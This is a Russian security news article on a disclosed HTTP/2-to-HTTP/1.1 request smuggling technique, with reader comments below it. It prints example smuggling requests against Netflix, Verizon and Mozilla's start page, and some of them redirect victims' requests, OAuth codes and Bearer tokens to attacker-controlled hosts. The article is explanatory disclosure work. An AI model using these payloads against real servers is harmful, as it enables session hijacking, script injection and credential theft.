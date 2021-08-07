The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Новая атака на системы фронтэнд-бэкенд, позволяющая вклиниться в запросы

07.08.2021 08:08

Web-системы, в которых фронтэнд принимает соединения по HTTP/2 и передаёт бэкенду по HTTP/1.1, оказались подвержены новому варианту атаки "HTTP Request Smuggling", позволяющей через отправку специально оформленных клиентских запросов вклиниваться в содержимое запросов других пользователей, обрабатываемых в том же потоке между фронтэндом и бэкендом. Атака может быть использована для подстановки вредоносного JavaScript-кода в сеанс с легитимным сайтом, обхода систем ограничения доступа и перехвата параметров аутентификации.

Проблеме подвержены web-прокси, балансировщики нагрузки, web-акселераторы, системы доставки контента и прочие конфигурации, в которых запросы перенаправляются по схеме фронтэнд-бэкенд. Автор исследования продемонстрировал возможность атаки на системы Netflix, Verizon, Bitbucket, Netlify CDN и Atlassian, и получил 56 тысяч долларов в программах по выплате вознаграждений за выявление уязвимостей. Наличие проблемы также подтверждено в продуктах F5 Networks. Частично проблема затрагивает mod_proxy в http-сервере Apache (CVE-2021-33193), исправления ожидается в версии 2.4.49 (разработчики были уведомлены о проблеме в начале мая и получили 3 месяца на исправление). В nginx возможность одновременного указания заголовков "Content-Length" и "Transfer-Encoding были блокированы в прошлом выпуске (1.21.1). Средства для проведения атак уже добавлены в инструментарий Burp и доступны в форме расширения Turbo Intruder.

Принцип действия нового метода вклинивания запросов в трафик аналогичен уязвимости, выявленной тем же исследователем два года назад, но ограниченной фронтэндами, принимающими запросы по HTTP/1.1. Напомним, что в схеме фронтэнд-бэкенд запросы клиентов принимает дополнительный узел - фронтэнд, который устанавливает долгоживующее TCP-соединение с бэкендом, осуществляющим непосредственную обработку запросов. Через данное общее соединение обычно передаются запросы разных пользователей, которые следуют по цепочке один за другим с разделением средствами протокола HTTP.

Классическая атака "HTTP Request Smuggling" основывалась на том, что фронтэнды и бэкенды по разному трактуют использование HTTP-заголовков "Content-Length" (определяет общий размер данных в запросе) и "Transfer-Encoding: chunked" (позволяет передавать данные по частям). Например, если фронтэнд поддерживает только "Content-Length", но игнорирует "Transfer-Encoding: chunked", то атакующий может отправить запрос, в котором одновременно указаны заголовки "Content-Length" и "Transfer-Encoding: chunked", но размер в "Content-Length" не соответствует размеру chunked-цепочки. В этом случае фронтэнд обработает и перенаправит запрос в соответствии с "Content-Length", а бэкенд будет ожидать завершения блока на основе "Transfer-Encoding: chunked" и оставшийся хвост запроса атакующего окажется вначале чужого запроса, переданного следом.

В отличие от текстового протокола HTTP/1.1, разбор которого осуществляется на уровне строк, HTTP/2 является бинарным протоколом и манипулирует блоками данных заранее указанного размера. При этом в HTTP/2 используются псевдо-заголовки, соответствующие обычным заголовкам HTTP. В случае взаимодействия с бэкендом по протоколу HTTP/1.1, фронтэнд транслирует эти псевдо-заголовки в аналогичные HTTP-заголовки HTTP/1.1. Проблема в том, что бэкенд принимает решения о разборе потока уже на основе выставленных фронтэндом HTTP-заголовков, не имея сведений о параметрах изначального запроса.

В том числе в форме псевдо-заголовков могут быть переданы значения "content-length" и "transfer-encoding", несмотря на то, что в HTTP/2 они не используются, так как размер всех данных определяется в отдельном поле. Тем не менее, в процессе преобразования запроса HTTP/2 в HTTP/1.1 данные заголовки переносятся и могут ввести в заблуждение бэкенд. Выделяется два основных варианта атаки: H2.TE и H2.CL, в которых бэкенд вводится в заблуждение некорректным значением transfer-encoding или content-length, не соответствующим реальному размеру тела запроса, поступившего к фронтэнду по протоколу HTTP/2.

В качестве примера атаки H2.CL приводится указание некорректного размера в псевдо-заголовке content-length при отправке запроса HTTP/2 к Netflix. Данный запрос приводит к добавлению аналогичного HTTP-заголовка Сontent-Length при обращении к бэкенду по HTTP/1.1, но так как размер в Сontent-Length указан меньше фактического, то часть данных в хвосте обрабатывается как начало следующего запроса.

Например, запрос HTTP/2 


   :method	POST
   :path	/n
   :authority	www.netflix.com
   content-length	4
   abcdGET /n HTTP/1.1
   Host: 02.rs?x.netflix.com
   Foo: bar

Приведёт к отправке бэкенду запроса: 


   POST /n HTTP/1.1
   Host: www.netflix.com
   Content-Length: 4

   abcdGET /n HTTP/1.1
   Host: 02.rs?x.netflix.com
   Foo: bar

Так как Content-Length имеет значение 4, то бэкенд воспримет в качестве тела запроса только "abcd", а остальную часть "GET /n HTTP/1.1..." обработает как начало следом идущего запроса, привязанного к другому пользователю. Соответственно, произойдёт рассинхронизация потока и в ответ на следом идущий запрос будет выдан результат обработки подставного запроса. В случае с Netflix указание стороннего хоста в заголовке "Host:" в подставном запросе привело к выводу клиенту ответа "Location: https://02.rs?x.netflix.com/n" и позволило передать клиенту произвольное содержимое, в том числе выполнить свой JavaScript-код в контексте сайта Netflix.

Второй вариант атаки (H2.TE) связан с подстановкой заголовка "Transfer-Encoding: chunked". Использование псевдо-заголовка transfer-encoding в HTTP/2 запрещено спецификацией и запросы с ним предписано трактовать как некорректные. Несмотря на это, некоторые реализации фронтэндов не учитывают данное требование и допускают использование псвевдо-заголовка transfer-encoding в HTTP/2, который преобразуется в аналогичный заголовок HTTP. При наличии заголовка "Transfer-Encoding" бэкенд может воспринять его более приоритетным и выполнить разбор данных по частям в режиме "chunked" с использованием блоков разного размера в формате "{размер}\r\n{блок}\r\n{размер}\r\n{блок}\r\n0", несмотря на изначальное разделение по общему размеру.

Наличие подобной бреши было продемонстрировано на примере компании Verizon. При этом проблема касалась портала аутентификации и системы управления контентом, которая также используется на таких сайтах как Huffington Post и Engadget. Например, запрос клиента по HTTP/2: 


   :method	POST
   :path	/identitfy/XUI
   :authority	id.b2b.oath.com
   transfer-encoding	chunked 
   0

   GET /oops HTTP/1.1
   Host: psres.net
   Content-Length: 10

   x=

Приводил к передаче бэкенду запроса HTTP/1.1: 


   POST /identity/XUI HTTP/1.1
   Host: id.b2b.oath.com
   Content-Length: 66
   Transfer-Encoding: chunked

   0

   GET /oops HTTP/1.1
   Host: psres.net
   Content-Length: 10

   x=

Бэкенд, в свою очередь, игнорировал заголовок "Content-Length" и выполнял разделение в потоке на основе "Transfer-Encoding: chunked". На практике атака позволила перенаправить запросы пользователей на свой сайт и в том числе перехватить запросы, связанные с аутентификацией OAuth, параметры которых светились в заголовке Referer, а также симулировать сеанс аутентификации и инициировать отправку системой пользователя учётных данных на хост атакующего. 


   GET /b2blanding/show/oops HTTP/1.1
   Host: psres.net
   Referer: https://id.b2b.oath.com/?…&code=secret

   GET / HTTP/1.1
   Host: psres.net
   Authorization: Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik…

Для атаки на реализации HTTP/2, не допускающие указание псевдо-заголовка transfer-encoding, был предложен ещё один метод, связанный с подстановкой заголовка "Transfer-Encoding" через его прикрепление к другим псевдо-заголовкам с разделением символом перевода строки (при преобразовании в HTTP/1.1 в подобном случае создаётся два отдельных HTTP-заголовка).

Например указанной проблеме оказались подвержены Atlassian Jira и Netlify CDN (используется для отдачи стартовой страницы Mozilla в Firefox). В частности, запрос HTTP/2 


   :method	POST
   :path	/
   :authority	start.mozilla.org
   foo	b\r\n
   transfer-encoding: chunked
   0\r\n
   \r\n
   GET / HTTP/1.1\r\n
   Host: evil-netlify-domain\r\n
   Content-Length: 5\r\n
   \r\n
   x=

приводил к отправке бэкенду запроса HTTP/1.1 


   POST / HTTP/1.1\r\n
   Host: start.mozilla.org\r\n
   Foo: b\r\n
   Transfer-Encoding: chunked\r\n
   Content-Length: 71\r\n
   \r\n
   0\r\n
   \r\n
   GET / HTTP/1.1\r\n
   Host: evil-netlify-domain\r\n
   Content-Length: 5\r\n
   \r\n
   x=

Ещё одним вариантом подстановки заголовка "Transfer-Encoding" стало прикрепление его к имени другого псевдозаголовка или к строке с методом запроса. Например, при обращении к Atlassian Jira имя псевдо-заголовка "foo: bar\r\ntransfer-encoding" со значением "chunked" приводило к добавлению HTTP-заголовков "foo: bar" и "transfer-encoding: chunked", а указание в псевдо-заголовке ":method" значения "GET / HTTP/1.1\r\nTransfer-encoding: chunked" транслировалось в "GET / HTTP/1.1\r\ntransfer-encoding: chunked".

Выявивший проблему исследователь также предложил технику туннелинга запросов для совершения атаки на фронтэнды, в которых для каждого IP-адреса устанавливается отдельное соединение с бэкендом и трафик разных пользователей не смешивается. Предложенная техника не позволяет вклиниваться в запросы других пользователей, но даёт возможность отравить общий кэш, влияющий на обработку других запросов, и позволяет выполнить подстановку внутренних HTTP-заголовков, используемых для передачи служебных сведений от фронтэнда к бэкенду (например, при аутентификации на стороне фронтэнда в подобных заголовках бэкенду могут передаваться сведения о текущем пользователе). В качестве примера применения метода на практике при помощи отравления кэша удалось получить контроль за страницами в сервисе Bitbucket.

  1. Главная ссылка к новости (https://portswigger.net/resear...)
  2. OpenNews: Проект Geneva развивает движок для автоматизации обхода цензурирования трафика
  3. OpenNews: Атака на системы фронтэнд-бэкенд, позволяющая вклиниться в сторонние запросы
  4. OpenNews: HTTP-заголовок Alt-Svc может применяться для сканирования портов внутренней сети
  5. OpenNews: RangeAmp - серия атак на CDN, манипулирующая HTTP-заголовком Range
  6. OpenNews: Уязвимость, позволяющая совершить MITM-атаку через манипуляцию с HTTP-заголовком Proxy
Лицензия: CC-BY
Тип: Интересно / Проблемы безопасности
Короткая ссылка: https://opennet.ru/55601-smuggling
Ключевые слова: smuggling, http2, proxy, attack
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (27) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 12:32, 07/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –4 +/
    Ой, ну надо же, http взломали, как удивительно. (Нет.)
     
  • 1.2, Anonymouse (?), 12:36, 07/08/2021 Скрыто модератором [﹢﹢﹢] [ · · · ]
    		• +8 +/
     
     
  • 2.4, OnTheEdge (ok), 12:40, 07/08/2021 Скрыто модератором
    		• +6 +/
     
     
  • 3.16, Аноним (16), 13:34, 07/08/2021 Скрыто модератором
    		• +3 +/
     
     
  • 4.19, Аноним (19), 13:49, 07/08/2021 Скрыто модератором
    		• –3 +/
     
  • 2.17, Admin (??), 13:40, 07/08/2021 Скрыто модератором
    		• +/
     

     ....ответы скрыты модератором (4)

  • 1.3, Онаним (?), 12:38, 07/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Уродство HTTP/2 таки выстрелило.
    То ли ещё будет с HTTP/много, которые вообще не HTTP.
     
     
  • 2.11, Аноним (11), 13:08, 07/08/2021 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    Так-то выстрелило уродство HTTP1, если почитать новость.
     
     
  • 3.14, Онаним (?), 13:15, 07/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Выстрелило уродство трансляции полубинарного уродства SPDY в HTTP.
     
     
  • 4.22, Аноним (22), 14:53, 07/08/2021 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    О да, лучше нормальный plain-text HTTP, от которого, правда, все отказались в пользу HTTPS, в котором из текста только вызов метода CONNECT.
     
  • 3.25, all_glory_to_the_hypnotoad (ok), 17:03, 07/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Это рукожопость разработчиков прокси ибо такие атаки очевидны и им сразу же нужно было уделять должное внимание.
     

  • 1.5, Аноним (5), 12:42, 07/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Т.е. они одним сплошным потоком байтов слали подряд разные запросы а потом надеялись что смогут разбить их обратно на части?
    Они похоже не читали статей где говорится о важности выбора разделителя и что самым надёжным будет разделять записи через набор символов !йух! .
     
     
  • 2.6, пох. (?), 12:49, 07/08/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    они читали много статей где п-делось о страшных и ужастных ЗАДЕРЖКАХ при открытии tcp сессии (особенно в рамках одного и того же локалхоста).
    И героически поебдили ненужную проблему.

     
     
  • 3.20, Аноним (19), 13:52, 07/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Да они же диллетанты. Не зря ты рекомендовал всем на Rust переходить!
     
     
  • 4.21, Mig (??), 14:32, 07/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Лучше на mig перейти руст для слабаков и если на него переходить то только на друст drust звучит!
     

  • 1.7, Аноним (7), 12:52, 07/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Полное вымирание сайтов http - вопрос времени
     
  • 1.8, Аноним (8), 12:57, 07/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –2 +/
    Слишком много букав!
     
     
  • 2.23, Аноним (22), 14:55, 07/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Погодите, через недельку для специально для олдовых админов выйдет хайпово-клиповая версия на тиктоке.
     

  • 1.9, Онаним (?), 12:59, 07/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Радует пока одно: у меня на фронтах немолодёжный haproxy, новый парсер которого по-человечески разбирает и перебирает запросы перед отдачей в бэкенды. В старом парсере до 2.0.6 были проблемы, ну так старый парсер для h2 в здравом уме юзать было сложно.
     
     
  • 2.10, пох. (?), 13:04, 07/08/2021 [^] [^^] [^^^] [ответить]  
    		• –3 +/
    нет ножек (ненужно/2) - нет проблемы.

    P.S. обратить внимание на нашествие в комменты м-ков "экспертов" борцунов с http.

     
     
  • 3.12, Онаним (?), 13:13, 07/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Я бы им вместо http sip с rtp посоветовал, но жалко бедняжек.
     

  • 1.13, Отражение луны (ok), 13:14, 07/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Оверинженеринг в действии
     
     
  • 2.26, all_glory_to_the_hypnotoad (ok), 17:06, 07/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Это как раз недоинженеринг, т.е. когда осилили работу с простым протоколом HTTP/2 и не осилили бинарно более сложный HTTP/1.x
     

  • 1.15, Аноним (15), 13:19, 07/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Ну так нгингс подвержен или нет? Где исправления?
     
     
  • 2.18, edo (ok), 13:41, 07/08/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Если я правильно прочитал changelog к 1.21.1, то это как раз оно:
    http://nginx.org/en/CHANGES
    Немного смущает, что  эта версия вышла месяц назад (впрочем, CVE-2021-21295 вообще от марта, так что известно об этой уязвимости давно)


    Тут просто написано «NGINX is not affected by this security exposure», без указания конкретных версий:
    https://support.f5.com/csp/article/K97045220

     

  • 1.24, Аноним (24), 15:52, 07/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Теперь все будут топить за "закопать" http и перейти на websocket?
     
  • 1.27, Kuromi (ok), 17:35, 07/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Не волйнутесь, сейчас Гугл быстренько придумает HTTP3...ой, нет, наверное уже HTTP4.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:

    Спонсоры:
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей     		Created 1996-2021 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру